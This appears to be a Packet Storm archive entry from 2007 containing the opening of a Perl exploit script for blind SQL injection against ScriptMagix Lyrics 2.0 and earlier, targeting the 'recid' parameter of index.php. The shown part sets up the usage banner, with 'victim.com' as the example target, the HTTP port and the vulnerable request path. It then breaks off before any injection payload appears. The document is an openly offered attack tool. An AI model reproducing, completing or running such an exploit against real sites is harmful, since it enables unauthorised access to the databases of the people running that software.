scriptmagix-sql.txt

2007-03-20T00:00:00
ID PACKETSTORM:55169
Type packetstorm
Reporter ajann
Modified 2007-03-20T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#[Script Name: ScriptMagix Lyrics <= 2.0 (index.php recid) Remote Blind SQL Injection Exploit  
#[Coded by : ajann  
#[Author : ajann  
#[Contact : :(  
#[S.Page : http://www.scriptmagix.com  
#[$$ : 35$  
#[.. : ajann,Turkey  
  
use IO::Socket;  
if(@ARGV < 1){  
print "  
[========================================================================  
[// ScriptMagix Lyrics <= 2.0 (index.php recid) Remote Blind SQL Injection Exploit  
[// Usage: exploit.pl [target]  
[// Example: exploit.pl victim.com  
[// Example: exploit.pl victim.com  
[// Vuln&Exp : ajann  
[========================================================================  
";  
exit();  
}  
#Local variables  
$server = $ARGV[0];  
$server =~ s/(http:\/\/)//eg;  
$host = "http://".$server;  
$port = "80";  
$file = "/index.php?cmd=6&recid=";  
  
print "Script <DIR> : ";  
$dir = <STDIN>;  
chop ($dir);  
  
if ($dir =~ /exit/){  
print "-- Exploit Failed[You Are Exited] \n";  
exit();  
}  
  
`